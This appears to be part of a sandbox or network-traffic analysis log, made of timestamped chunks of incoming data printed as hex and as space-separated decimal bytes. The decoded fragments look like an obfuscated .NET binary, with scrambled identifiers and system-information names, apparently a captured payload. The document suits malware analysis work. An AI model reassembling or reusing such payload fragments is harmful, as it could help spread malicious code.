                    2021-10-26 16:59:45 UTC4119INData Raw: 35 20 32 34 39 20 31 34 38 20 31 34 34 20 32 34 35 20 32 31 38 20 31 37 30 20 32 33 20 32 33 20 31 36 34 20 31 30 33 20 34 20 32 30 34 20 32 30 38 20 36 31 20 31 33 33 20 33 30 20 34 38 20 31 34 37 20 31 20 31 33 36 20 39 35 20 31 39 31 20 36 20 31 38 39 20 31 32 30 20 39 37 20 32 32 38 20 31 34 35 20 32 35 34 20 31 38 31 20 34 37 20 38 34 20 31 30 35 20 31 35 20 31 31 37 20 38 31 20 31 39 31 20 37 30 20 38 33 20 31 39 30 20 32 30 31 20 39 32 20 32 31 38 20 31 39 39 20 31 34 36 20 31 32 32 20 31 31 31 20 31 35 36 20 39 32 20 31 35 32 20 31 20 31 38 30 20 32 33 20 31 31 20 31 32 38 20 31 34 33 20 36 31 20 37 32 20 32 32 38 20 32 36 20 34 33 20 31 34 30 20 31 39 33 20 31 34 37 20 38 39 20 31 34 34 20 36 20 35 32 20 33 20 33 34 20 33 31 20 37 36 20 38 20 36
                    Data Ascii: 5 249 148 144 245 218 170 23 23 164 103 4 204 208 61 133 30 48 147 1 136 95 191 6 189 120 97 228 145 254 181 47 84 105 15 117 81 191 70 83 190 201 92 218 199 146 122 111 156 92 152 1 180 23 11 128 143 61 72 228 26 43 140 193 147 89 144 6 52 3 34 31 76 8 6
                    2021-10-26 16:59:45 UTC4135INData Raw: 37 20 36 33 20 31 39 31 20 32 32 33 20 35 30 20 37 31 20 31 37 30 20 32 31 39 20 34 35 20 32 34 39 20 31 34 31 20 37 32 20 32 33 37 20 32 35 35 20 31 30 30 20 31 39 31 20 31 36 31 20 31 38 36 20 32 30 34 20 32 32 30 20 32 39 20 31 31 32 20 38 32 20 33 33 20 33 39 20 37 31 20 32 31 20 36 34 20 31 34 36 20 31 37 38 20 31 34 39 20 31 34 32 20 31 35 35 20 39 38 20 31 39 34 20 32 34 36 20 33 31 20 32 34 35 20 32 32 39 20 31 38 31 20 31 31 37 20 31 32 31 20 31 38 20 32 34 33 20 31 34 32 20 31 31 32 20 32 34 37 20 31 34 36 20 39 30 20 31 31 33 20 31 32 37 20 31 36 39 20 33 38 20 32 31 34 20 32 35 34 20 34 20 31 36 36 20 37 33 20 31 39 31 20 31 39 33 20 32 31 32 20 31 39 20 31 38 34 20 33 39 20 31 37 35 20 31 39 34 20 31 38 37 20 32 34 32 20 31 30 37 20 31 33 38
                    Data Ascii: 7 63 191 223 50 71 170 219 45 249 141 72 237 255 100 191 161 186 204 220 29 112 82 33 39 71 21 64 146 178 149 142 155 98 194 246 31 245 229 181 117 121 18 243 142 112 247 146 90 113 127 169 38 214 254 4 166 73 191 193 212 19 184 39 175 194 187 242 107 138
                    2021-10-26 16:59:45 UTC4151INData Raw: 31 39 20 31 30 34 20 32 32 34 20 31 36 38 20 31 31 20 32 34 32 20 31 37 32 20 31 37 33 20 31 36 32 20 31 35 37 20 38 39 20 32 33 38 20 31 33 39 20 32 33 37 20 39 33 20 32 33 20 32 33 20 31 36 20 32 33 36 20 32 34 30 20 31 39 33 20 31 34 37 20 34 35 20 33 36 20 34 30 20 32 31 20 31 34 30 20 31 35 34 20 32 32 37 20 32 35 31 20 31 30 34 20 32 38 20 32 32 35 20 31 33 33 20 38 39 20 32 30 30 20 31 32 20 32 32 38 20 32 35 20 31 35 36 20 32 31 35 20 31 37 32 20 31 38 31 20 37 33 20 36 39 20 31 38 37 20 32 30 20 35 30 20 32 31 34 20 31 33 36 20 32 30 33 20 36 30 20 34 34 20 36 35 20 33 31 20 31 34 33 20 31 35 36 20 32 34 37 20 35 34 20 35 32 20 31 32 33 20 32 32 36 20 32 34 33 20 31 36 33 20 32 30 33 20 32 33 36 20 31 32 38 20 36 32 20 34 33 20 32 33 33 20 36 20
                    Data Ascii: 19 104 224 168 11 242 172 173 162 157 89 238 139 237 93 23 23 16 236 240 193 147 45 36 40 21 140 154 227 251 104 28 225 133 89 200 12 228 25 156 215 172 181 73 69 187 20 50 214 136 203 60 44 65 31 143 156 247 54 52 123 226 243 163 203 236 128 62 43 233 6
                    2021-10-26 16:59:45 UTC4167INData Raw: 36 20 31 38 34 20 31 33 35 20 31 31 33 20 31 30 35 20 32 35 20 32 34 33 20 33 20 31 31 20 33 20 31 37 35 20 33 35 20 31 32 20 32 32 36 20 31 32 39 20 31 32 20 31 36 31 20 31 34 20 31 32 30 20 32 32 20 34 39 20 32 34 35 20 32 33 37 20 31 30 36 20 31 33 20 33 37 20 31 36 30 20 32 31 36 20 30 20 35 30 20 31 32 32 20 31 32 34 20 31 38 39 20 31 30 36 20 32 33 32 20 31 31 35 20 31 39 36 20 33 20 33 20 37 20 31 39 34 20 32 32 30 20 31 32 20 31 38 20 32 30 31 20 39 34 20 37 36 20 31 35 31 20 39 32 20 31 38 34 20 38 35 20 31 38 35 20 39 20 34 37 20 37 31 20 31 32 37 20 31 33 31 20 31 35 31 20 37 32 20 37 31 20 32 33 34 20 31 35 35 20 31 30 31 20 33 30 20 37 32 20 33 20 31 38 38 20 37 36 20 31 35 38 20 32 37 20 31 31 31 20 36 34 20 37 36 20 37 39 20 31 37 37 20 39
                    Data Ascii: 6 184 135 113 105 25 243 3 11 3 175 35 12 226 129 12 161 14 120 22 49 245 237 106 13 37 160 216 0 50 122 124 189 106 232 115 196 3 3 7 194 220 12 18 201 94 76 151 92 184 85 185 9 47 71 127 131 151 72 71 234 155 101 30 72 3 188 76 158 27 111 64 76 79 177 9
                    2021-10-26 16:59:45 UTC4183INData Raw: 20 31 32 38 20 30 20 30 20 31 30 20 33 32 20 30 20 30 20 30 20 30 20 32 35 34 20 31 20 32 35 34 20 31 34 20 37 20 30 20 34 33 20 36 20 32 35 34 20 32 32 20 31 31 36 20 30 20 30 20 31 20 32 35 34 20 31 32 20 37 20 30 20 35 37 20 32 35 20 30 20 30 20 30 20 33 32 20 36 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 32 35 34 20 39 20 31 20 30 20 34 30 20 31 32 37 20 30 20 30 20 31 30 20 34 30 20 31 30 35 20 30 20 30 20 31 30 20 33 38 20 30 20 30 20 33 32 20 38 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 32 35 34 20 39 20 31 20 30 20 34 30 20 31 32 39 20 30 20 30 20 31 30 20 33 32 20 30 20 30 20 30 20 30 20 32 35 34 20 31 20 32 35 34 20 31 34 20 38 20 30 20 32 35 34 20 31 32 20 38 20 30 20 35 37 20 32 35 20 30 20 30 20 30 20 33 32 20 39 20 30
                    Data Ascii: 128 0 0 10 32 0 0 0 0 254 1 254 14 7 0 43 6 254 22 116 0 0 1 254 12 7 0 57 25 0 0 0 32 6 0 0 0 254 14 3 0 254 9 1 0 40 127 0 0 10 40 105 0 0 10 38 0 0 32 8 0 0 0 254 14 3 0 254 9 1 0 40 129 0 0 10 32 0 0 0 0 254 1 254 14 8 0 254 12 8 0 57 25 0 0 0 32 9 0
                    2021-10-26 16:59:45 UTC4199INData Raw: 30 20 32 35 34 20 31 34 20 33 20 30 20 33 32 20 31 20 30 20 30 20 30 20 32 35 34 20 31 34 20 30 20 30 20 35 36 20 32 31 35 20 35 20 30 20 30 20 30 20 30 20 33 32 20 32 36 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 31 31 34 20 31 30 31 20 37 20 34 20 31 31 32 20 31 31 34 20 32 34 34 20 34 20 34 20 31 31 32 20 34 30 20 31 31 31 20 30 20 30 20 36 20 31 31 31 20 31 35 33 20 30 20 30 20 31 30 20 31 31 34 20 31 31 38 20 36 20 34 20 31 31 32 20 31 31 31 20 31 31 38 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 31 34 20 30 20 32 35 34 20 31 32 20 31 34 20 30 20 35 37 20 32 34 20 30 20 30 20 30 20 33 32 20 32 37 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 33 32 20 31 20 30 20 30 20 30 20 32 35 34 20 31 34 20 30 20 30 20 35 36 20 31 33 38 20 35
                    Data Ascii: 0 254 14 3 0 32 1 0 0 0 254 14 0 0 56 215 5 0 0 0 0 32 26 0 0 0 254 14 3 0 114 101 7 4 112 114 244 4 4 112 40 111 0 0 6 111 153 0 0 10 114 118 6 4 112 111 118 0 0 10 254 14 14 0 254 12 14 0 57 24 0 0 0 32 27 0 0 0 254 14 3 0 32 1 0 0 0 254 14 0 0 56 138 5
                    2021-10-26 16:59:45 UTC4215INData Raw: 35 35 20 32 32 38 20 32 35 35 20 32 35 35 20 32 35 35 20 32 32 32 20 35 38 20 38 20 31 31 20 36 20 33 31 20 32 35 34 20 34 38 20 33 20 32 33 20 34 33 20 31 20 36 20 36 39 20 32 20 30 20 30 20 30 20 30 20 30 20 30 20 30 20 32 30 34 20 32 35 35 20 32 35 35 20 32 35 35 20 32 32 32 20 33 32 20 31 31 37 20 33 31 20 30 20 30 20 31 20 32 30 20 32 35 34 20 33 20 36 20 32 32 20 32 35 34 20 33 20 39 35 20 37 20 32 32 20 32 35 34 20 31 20 39 35 20 32 35 34 20 31 37 20 31 31 36 20 33 31 20 30 20 30 20 31 20 34 30 20 35 33 20 30 20 30 20 31 30 20 32 32 32 20 31 39 38 20 33 32 20 35 31 20 30 20 31 30 20 31 32 38 20 34 30 20 36 34 20 30 20 30 20 31 30 20 31 32 32 20 37 20 34 34 20 36 20 34 30 20 35 35 20 30 20 30 20 31 30 20 30 20 34 32 20 30 20 30 20 30 20 31 20 31 36
                    Data Ascii: 55 228 255 255 255 222 58 8 11 6 31 254 48 3 23 43 1 6 69 2 0 0 0 0 0 0 0 204 255 255 255 222 32 117 31 0 0 1 20 254 3 6 22 254 3 95 7 22 254 1 95 254 17 116 31 0 0 1 40 53 0 0 10 222 198 32 51 0 10 128 40 64 0 0 10 122 7 44 6 40 55 0 0 10 0 42 0 0 0 1 16
                    2021-10-26 16:59:45 UTC4231INData Raw: 30 20 30 20 30 20 33 31 20 31 30 31 20 31 35 37 20 33 37 20 33 32 20 36 20 30 20 30 20 30 20 33 31 20 35 30 20 31 35 37 20 33 37 20 32 38 20 33 31 20 31 31 34 20 31 35 37 20 33 37 20 33 32 20 35 20 30 20 30 20 30 20 33 31 20 31 30 30 20 31 35 37 20 33 37 20 33 32 20 35 20 30 20 30 20 30 20 33 31 20 31 30 30 20 31 35 37 20 33 37 20 33 32 20 35 20 30 20 30 20 30 20 33 31 20 39 38 20 31 35 37 20 33 37 20 33 32 20 35 20 30 20 30 20 30 20 33 31 20 34 38 20 31 35 37 20 33 37 20 32 37 20 33 31 20 38 30 20 31 35 37 20 33 37 20 33 32 20 34 20 30 20 30 20 30 20 33 31 20 31 30 31 20 31 35 37 20 33 37 20 33 32 20 34 20 30 20 30 20 30 20 33 31 20 31 30 30 20 31 35 37 20 33 37 20 33 32 20 34 20 30 20 30 20 30 20 33 31 20 31 30 32 20 31 35 37 20 33 37 20 33 32 20 34 20
                    Data Ascii: 0 0 0 31 101 157 37 32 6 0 0 0 31 50 157 37 28 31 114 157 37 32 5 0 0 0 31 100 157 37 32 5 0 0 0 31 100 157 37 32 5 0 0 0 31 98 157 37 32 5 0 0 0 31 48 157 37 27 31 80 157 37 32 4 0 0 0 31 101 157 37 32 4 0 0 0 31 100 157 37 32 4 0 0 0 31 102 157 37 32 4
                    2021-10-26 16:59:45 UTC4247INData Raw: 20 35 20 30 20 33 32 20 34 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 32 35 34 20 31 32 20 35 20 30 20 32 35 34 20 31 34 20 37 20 30 20 32 35 34 20 31 32 20 37 20 30 20 35 37 20 32 34 20 30 20 30 20 30 20 33 32 20 35 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 31 32 36 20 34 33 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 36 20 30 20 30 20 35 36 20 32 31 37 20 30 20 30 20 30 20 30 20 33 32 20 37 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 32 35 34 20 31 32 20 34 20 30 20 33 32 20 30 20 30 20 30 20 30 20 31 35 34 20 31 31 31 20 32 30 37 20 30 20 30 20 31 30 20 30 20 33 32 20 38 20 30 20 30 20 30 20 32 35 34 20 31 34 20 33 20 30 20 33 32 20 30 20 30 20 30 20 30 20 34 30 20 35 37 20 30 20 30 20 31 30 20 32 35 34 20 31 34 20 38
                    Data Ascii: 5 0 32 4 0 0 0 254 14 3 0 254 12 5 0 254 14 7 0 254 12 7 0 57 24 0 0 0 32 5 0 0 0 254 14 3 0 126 43 0 0 10 254 14 6 0 0 56 217 0 0 0 0 32 7 0 0 0 254 14 3 0 254 12 4 0 32 0 0 0 0 154 111 207 0 0 10 0 32 8 0 0 0 254 14 3 0 32 0 0 0 0 40 57 0 0 10 254 14 8
                    2021-10-26 16:59:45 UTC4263INData Raw: 20 38 36 20 31 32 38 20 38 37 20 31 32 31 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 30 20 31 30 39 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 32 30 39 20 31 38 39 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 38 36 20 39 38 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 32 32 39 20 32 32 33 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 32 33 36 20 32 31 31 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 31 36 20 31 36 31 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 31 33 33 20 31 33 34 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 32 35 34 20 31 34 30 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 36 37 20 31 30 37 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 36 20 31 39 38 20 31 36 35 20 31 32 20 38 36 20 31 32 38 20 32 34 36 20 31 36 31 20 31 36 35 20 31 32
                    Data Ascii: 86 128 87 121 165 12 86 128 0 109 165 12 86 128 209 189 165 12 86 128 86 98 165 12 86 128 229 223 165 12 86 128 236 211 165 12 86 128 16 161 165 12 86 128 133 134 165 12 86 128 254 140 165 12 86 128 67 107 165 12 86 128 6 198 165 12 86 128 246 161 165 12
                    2021-10-26 16:59:45 UTC4279INData Raw: 20 31 34 35 20 31 20 31 33 39 20 35 34 20 35 37 20 32 20 38 39 20 32 20 38 30 20 32 35 20 36 31 20 32 20 39 37 20 32 20 33 39 20 32 36 20 36 38 20 32 20 31 30 35 20 32 20 31 38 39 20 36 39 20 36 38 20 32 20 31 31 33 20 32 20 31 38 33 20 31 38 20 37 32 20 32 20 37 33 20 32 20 31 36 30 20 32 33 20 38 32 20 32 20 31 39 33 20 30 20 31 34 38 20 35 38 20 38 37 20 32 20 31 39 33 20 30 20 32 34 20 31 35 20 36 31 20 31 20 31 39 33 20 30 20 39 34 20 32 35 20 35 37 20 32 20 31 32 31 20 32 20 32 34 30 20 31 34 20 31 31 31 20 32 20 31 39 33 20 30 20 31 30 36 20 35 35 20 36 20 30 20 35 32 20 30 20 31 31 37 20 32 33 20 31 33 30 20 32 20 31 32 39 20 32 20 33 39 20 34 20 31 34 32 20 32 20 31 32 39 20 32 20 34 30 20 35 38 20 31 34 38 20 32 20 31 33 37 20 31 20 31 31 30 20
                    Data Ascii: 145 1 139 54 57 2 89 2 80 25 61 2 97 2 39 26 68 2 105 2 189 69 68 2 113 2 183 18 72 2 73 2 160 23 82 2 193 0 148 58 87 2 193 0 24 15 61 1 193 0 94 25 57 2 121 2 240 14 111 2 193 0 106 55 6 0 52 0 117 23 130 2 129 2 39 4 142 2 129 2 40 58 148 2 137 1 110
                    2021-10-26 16:59:45 UTC4295INData Raw: 31 20 31 31 36 20 31 30 31 20 31 31 34 20 35 33 20 30 20 37 33 20 31 31 30 20 31 31 38 20 39 37 20 31 30 38 20 31 30 35 20 31 30 30 20 37 33 20 31 30 39 20 39 37 20 31 30 33 20 31 30 31 20 38 37 20 31 30 35 20 31 31 30 20 34 39 20 35 34 20 30 20 38 32 20 31 30 31 20 39 37 20 31 30 30 20 37 33 20 31 31 30 20 31 31 36 20 34 39 20 35 34 20 30 20 38 34 20 31 31 31 20 37 33 20 31 31 30 20 31 31 36 20 34 39 20 35 34 20 30 20 35 37 20 36 38 20 35 33 20 35 34 20 35 33 20 35 36 20 36 35 20 36 38 20 35 31 20 36 37 20 35 37 20 35 32 20 36 39 20 35 31 20 35 36 20 36 38 20 36 38 20 36 37 20 35 32 20 36 36 20 36 37 20 34 39 20 36 36 20 36 37 20 35 31 20 34 38 20 36 35 20 34 38 20 35 31 20 36 38 20 35 32 20 36 39 20 35 33 20 36 38 20 34 39 20 35 33 20 37 30 20 35 33 20
                    Data Ascii: 1 116 101 114 53 0 73 110 118 97 108 105 100 73 109 97 103 101 87 105 110 49 54 0 82 101 97 100 73 110 116 49 54 0 84 111 73 110 116 49 54 0 57 68 53 54 53 56 65 68 51 67 57 52 69 51 56 68 68 67 52 66 67 49 66 67 51 48 65 48 51 68 52 69 53 68 49 53 70 53
                    2021-10-26 16:59:45 UTC4311INData Raw: 30 31 20 31 30 33 20 39 37 20 31 31 36 20 31 30 31 20 30 20 37 38 20 31 31 31 20 31 31 36 20 31 30 34 20 31 30 35 20 31 31 30 20 31 30 33 20 38 34 20 31 31 31 20 38 34 20 31 30 31 20 31 31 34 20 31 30 39 20 31 30 35 20 31 31 30 20 39 37 20 31 31 36 20 31 30 31 20 30 20 36 38 20 31 30 31 20 31 30 38 20 31 30 31 20 31 30 33 20 39 37 20 31 31 36 20 31 30 31 20 36 35 20 31 31 35 20 31 32 31 20 31 31 30 20 39 39 20 38 33 20 31 31 36 20 39 37 20 31 31 36 20 31 30 31 20 30 20 36 38 20 31 30 31 20 39 38 20 31 31 37 20 31 30 33 20 31 30 33 20 31 30 31 20 31 31 34 20 36 36 20 31 31 34 20 31 31 31 20 31 31 39 20 31 31 35 20 39 37 20 39 38 20 31 30 38 20 31 30 31 20 38 33 20 31 31 36 20 39 37 20 31 31 36 20 31 30 31 20 30 20 36 39 20 31 30 30 20 31 30 35 20 31 31 36
                    Data Ascii: 01 103 97 116 101 0 78 111 116 104 105 110 103 84 111 84 101 114 109 105 110 97 116 101 0 68 101 108 101 103 97 116 101 65 115 121 110 99 83 116 97 116 101 0 68 101 98 117 103 103 101 114 66 114 111 119 115 97 98 108 101 83 116 97 116 101 0 69 100 105 116
                    2021-10-26 16:59:45 UTC4327INData Raw: 20 37 33 20 31 31 30 20 31 30 32 20 31 31 31 20 31 31 34 20 31 30 39 20 39 37 20 31 31 36 20 31 30 35 20 31 31 31 20 31 31 30 20 30 20 38 33 20 31 32 31 20 31 31 35 20 31 31 36 20 31 30 31 20 31 30 39 20 37 37 20 31 30 31 20 31 30 39 20 31 31 31 20 31 31 34 20 31 32 31 20 36 37 20 31 30 34 20 39 37 20 31 31 30 20 31 31 30 20 31 30 31 20 31 30 38 20 37 33 20 31 31 30 20 31 30 32 20 31 31 31 20 31 31 34 20 31 30 39 20 39 37 20 31 31 36 20 31 30 35 20 31 31 31 20 31 31 30 20 30 20 38 33 20 31 32 31 20 31 31 35 20 31 31 36 20 31 30 31 20 31 30 39 20 38 30 20 39 37 20 31 30 33 20 31 30 31 20 31 30 30 20 38 30 20 31 31 31 20 31 31 31 20 31 30 38 20 37 33 20 31 31 30 20 31 30 32 20 31 31 31 20 31 31 34 20 31 30 39 20 39 37 20 31 31 36 20 31 30 35 20 31 31 31 20
                    Data Ascii: 73 110 102 111 114 109 97 116 105 111 110 0 83 121 115 116 101 109 77 101 109 111 114 121 67 104 97 110 110 101 108 73 110 102 111 114 109 97 116 105 111 110 0 83 121 115 116 101 109 80 97 103 101 100 80 111 111 108 73 110 102 111 114 109 97 116 105 111
                    2021-10-26 16:59:45 UTC4343INData Raw: 35 20 31 31 31 20 31 31 34 20 30 20 36 38 20 39 37 20 31 31 36 20 39 37 20 36 39 20 31 31 34 20 31 31 34 20 31 31 31 20 31 31 34 20 30 20 36 37 20 31 31 34 20 39 39 20 36 39 20 31 31 34 20 31 31 34 20 31 31 31 20 31 31 34 20 30 20 38 33 20 31 31 36 20 31 30 30 20 36 39 20 31 31 34 20 31 31 34 20 31 31 31 20 31 31 34 20 30 20 37 33 20 31 31 30 20 38 30 20 39 37 20 31 30 33 20 31 30 31 20 36 39 20 31 31 34 20 31 31 34 20 31 31 31 20 31 31 34 20 30 20 37 33 20 31 31 30 20 31 31 36 20 31 30 31 20 31 31 34 20 31 31 30 20 39 37 20 31 30 38 20 36 39 20 31 31 34 20 31 31 34 20 31 31 31 20 31 31 34 20 30 20 36 37 20 31 31 34 20 31 30 31 20 39 37 20 31 31 36 20 31 30 31 20 38 30 20 31 31 34 20 31 31 31 20 31 30 36 20 31 30 31 20 39 39 20 31 31 36 20 36 39 20 31 31
                    Data Ascii: 5 111 114 0 68 97 116 97 69 114 114 111 114 0 67 114 99 69 114 114 111 114 0 83 116 100 69 114 114 111 114 0 73 110 80 97 103 101 69 114 114 111 114 0 73 110 116 101 114 110 97 108 69 114 114 111 114 0 67 114 101 97 116 101 80 114 111 106 101 99 116 69 11
                    2021-10-26 16:59:45 UTC4359INData Raw: 35 34 20 35 30 20 38 38 20 35 33 20 30 20 38 34 20 31 31 37 20 31 31 32 20 31 30 38 20 31 30 31 20 39 36 20 35 33 20 30 20 31 30 33 20 31 30 31 20 31 31 36 20 39 35 20 36 35 20 31 30 30 20 35 36 20 35 32 20 37 38 20 37 32 20 37 39 20 35 32 20 31 30 31 20 35 32 20 39 37 20 35 31 20 35 35 20 31 30 35 20 35 33 20 30 20 39 35 20 39 35 20 39 35 20 36 38 20 31 30 31 20 35 31 20 31 30 32 20 31 32 32 20 38 35 20 35 31 20 35 32 20 31 30 39 20 36 35 20 35 31 20 35 34 20 30 20 39 35 20 39 35 20 39 35 20 37 39 20 31 30 32 20 31 30 30 20 39 37 20 35 36 20 35 32 20 35 30 20 31 30 30 20 35 33 20 37 36 20 34 39 20 35 34 20 31 30 32 20 35 34 20 35 35 20 30 20 31 30 33 20 31 30 31 20 31 31 36 20 39 35 20 36 35 20 31 31 38 20 35 33 20 35 31 20 35 32 20 31 30 32 20 34 38 20
                    Data Ascii: 54 50 88 53 0 84 117 112 108 101 96 53 0 103 101 116 95 65 100 56 52 78 72 79 52 101 52 97 51 55 105 53 0 95 95 95 68 101 51 102 122 85 51 52 109 65 51 54 0 95 95 95 79 102 100 97 56 52 50 100 53 76 49 54 102 54 55 0 103 101 116 95 65 118 53 51 52 102 48
                    2021-10-26 16:59:45 UTC4375INData Raw: 32 33 31 20 31 34 31 20 31 32 38 20 32 33 31 20 31 34 31 20 31 39 30 20 32 33 31 20 31 34 30 20 31 39 31 20 32 33 31 20 31 34 31 20 31 35 33 20 32 33 31 20 31 34 31 20 31 37 36 20 32 33 31 20 31 34 31 20 31 33 30 20 30 20 32 33 34 20 31 34 31 20 31 39 30 20 32 33 34 20 31 34 31 20 31 39 31 20 32 33 34 20 31 34 32 20 31 37 36 20 32 33 34 20 31 34 31 20 31 39 31 20 32 33 34 20 31 34 32 20 31 35 34 20 32 33 34 20 31 34 32 20 31 37 34 20 32 33 34 20 31 34 32 20 31 33 30 20 32 33 34 20 31 34 31 20 31 39 30 20 32 33 34 20 31 34 32 20 31 37 33 20 32 33 34 20 31 34 32 20 31 32 38 20 32 33 34 20 31 34 32 20 31 34 38 20 32 33 34 20 31 34 32 20 31 32 39 20 32 33 34 20 31 34 32 20 31 37 36 20 32 33 34 20 31 34 32 20 31 37 32 20 32 33 34 20 31 34 32 20 31 33 30 20 30
                    Data Ascii: 231 141 128 231 141 190 231 140 191 231 141 153 231 141 176 231 141 130 0 234 141 190 234 141 191 234 142 176 234 141 191 234 142 154 234 142 174 234 142 130 234 141 190 234 142 173 234 142 128 234 142 148 234 142 129 234 142 176 234 142 172 234 142 130 0
                    2021-10-26 16:59:45 UTC4391INData Raw: 31 20 31 35 30 20 32 30 31 20 31 35 34 20 32 30 32 20 31 33 34 20 32 30 31 20 31 35 35 20 32 30 32 20 31 33 35 20 32 30 31 20 31 35 33 20 32 30 31 20 31 35 30 20 32 30 31 20 31 38 35 20 32 30 32 20 31 33 37 20 30 20 32 32 39 20 31 39 31 20 31 37 33 20 32 32 39 20 31 39 31 20 31 38 30 20 32 33 30 20 31 32 38 20 31 35 36 20 32 32 39 20 31 39 31 20 31 37 36 20 32 33 30 20 31 32 38 20 31 35 38 20 32 32 39 20 31 39 31 20 31 37 32 20 32 33 30 20 31 32 38 20 31 36 31 20 32 32 39 20 31 39 31 20 31 37 34 20 32 33 30 20 31 32 38 20 31 32 39 20 32 32 39 20 31 39 31 20 31 37 39 20 32 32 39 20 31 39 31 20 31 39 31 20 32 33 30 20 31 32 38 20 31 33 30 20 32 33 30 20 31 32 38 20 31 35 39 20 32 32 39 20 31 39 31 20 31 37 39 20 32 33 30 20 31 32 38 20 31 33 38 20 30 20 32
                    Data Ascii: 1 150 201 154 202 134 201 155 202 135 201 153 201 150 201 185 202 137 0 229 191 173 229 191 180 230 128 156 229 191 176 230 128 158 229 191 172 230 128 161 229 191 174 230 128 129 229 191 179 229 191 191 230 128 130 230 128 159 229 191 179 230 128 138 0 2
                    2021-10-26 16:59:45 UTC4407INData Raw: 31 38 37 20 31 37 33 20 32 33 35 20 31 38 38 20 31 33 39 20 32 33 35 20 31 38 37 20 31 35 33 20 32 33 35 20 31 38 37 20 31 38 36 20 32 33 35 20 31 38 37 20 31 35 37 20 32 33 35 20 31 38 37 20 31 34 34 20 32 33 35 20 31 38 37 20 31 34 34 20 32 33 35 20 31 38 37 20 31 39 30 20 32 33 35 20 31 38 37 20 31 34 34 20 32 33 35 20 31 38 37 20 31 33 39 20 32 33 35 20 31 38 37 20 31 34 34 20 30 20 32 33 39 20 31 38 37 20 31 37 35 20 32 33 39 20 31 38 38 20 31 33 34 20 32 33 39 20 31 38 38 20 31 34 38 20 32 33 39 20 31 38 38 20 31 33 37 20 32 33 39 20 31 38 38 20 31 34 39 20 32 33 39 20 31 38 37 20 31 35 36 20 32 33 39 20 31 38 37 20 31 38 34 20 32 33 39 20 31 38 37 20 31 35 31 20 32 33 39 20 31 38 37 20 31 35 30 20 32 33 39 20 31 38 37 20 31 37 37 20 32 33 39 20 31
                    Data Ascii: 187 173 235 188 139 235 187 153 235 187 186 235 187 157 235 187 144 235 187 144 235 187 190 235 187 144 235 187 139 235 187 144 0 239 187 175 239 188 134 239 188 148 239 188 137 239 188 149 239 187 156 239 187 184 239 187 151 239 187 150 239 187 177 239 1
                    2021-10-26 16:59:45 UTC4423INData Raw: 37 20 31 35 32 20 32 33 30 20 31 37 36 20 31 38 31 20 32 33 30 20 31 37 36 20 31 36 39 20 32 33 30 20 31 37 37 20 31 35 31 20 32 33 30 20 31 37 37 20 31 35 30 20 32 33 30 20 31 37 37 20 31 33 36 20 32 33 30 20 31 37 37 20 31 33 31 20 32 33 30 20 31 37 37 20 31 35 32 20 32 33 30 20 31 37 36 20 31 36 39 20 32 33 30 20 31 37 36 20 31 36 34 20 32 33 30 20 31 37 37 20 31 35 31 20 30 20 32 33 30 20 31 38 39 20 31 34 36 20 32 33 30 20 31 38 38 20 31 37 30 20 32 33 30 20 31 38 38 20 31 37 39 20 32 33 30 20 31 38 39 20 31 35 31 20 32 33 30 20 31 38 39 20 31 33 33 20 32 33 30 20 31 38 39 20 31 35 30 20 32 33 30 20 31 38 39 20 31 37 31 20 32 33 30 20 31 38 39 20 31 33 30 20 32 33 30 20 31 38 38 20 31 36 33 20 32 33 30 20 31 38 38 20 31 36 33 20 32 33 30 20 31 38 39
                    Data Ascii: 7 152 230 176 181 230 176 169 230 177 151 230 177 150 230 177 136 230 177 131 230 177 152 230 176 169 230 176 164 230 177 151 0 230 189 146 230 188 170 230 188 179 230 189 151 230 189 133 230 189 150 230 189 171 230 189 130 230 188 163 230 188 163 230 189
                    2021-10-26 16:59:45 UTC4439INData Raw: 31 38 35 20 32 32 36 20 31 38 37 20 31 33 33 20 32 32 36 20 31 38 36 20 31 34 31 20 32 32 36 20 31 38 36 20 31 38 35 20 32 32 36 20 31 38 36 20 31 34 30 20 32 32 36 20 31 38 36 20 31 35 38 20 30 20 32 32 39 20 31 38 38 20 31 34 33 20 32 32 39 20 31 38 38 20 31 34 30 20 32 32 39 20 31 38 38 20 31 36 31 20 32 32 39 20 31 38 38 20 31 34 32 20 32 32 39 20 31 38 37 20 31 35 37 20 32 32 39 20 31 38 38 20 31 34 35 20 32 32 39 20 31 38 37 20 31 35 37 20 32 32 39 20 31 38 37 20 31 35 35 20 32 32 39 20 31 38 38 20 31 34 35 20 32 32 39 20 31 38 37 20 31 35 35 20 32 32 39 20 31 38 37 20 31 38 35 20 32 32 39 20 31 38 37 20 31 36 33 20 32 32 39 20 31 38 38 20 31 34 34 20 32 32 39 20 31 38 37 20 31 36 33 20 32 32 39 20 31 38 37 20 31 35 38 20 30 20 32 33 32 20 31 38 38
                    Data Ascii: 185 226 187 133 226 186 141 226 186 185 226 186 140 226 186 158 0 229 188 143 229 188 140 229 188 161 229 188 142 229 187 157 229 188 145 229 187 157 229 187 155 229 188 145 229 187 155 229 187 185 229 187 163 229 188 144 229 187 163 229 187 158 0 232 188
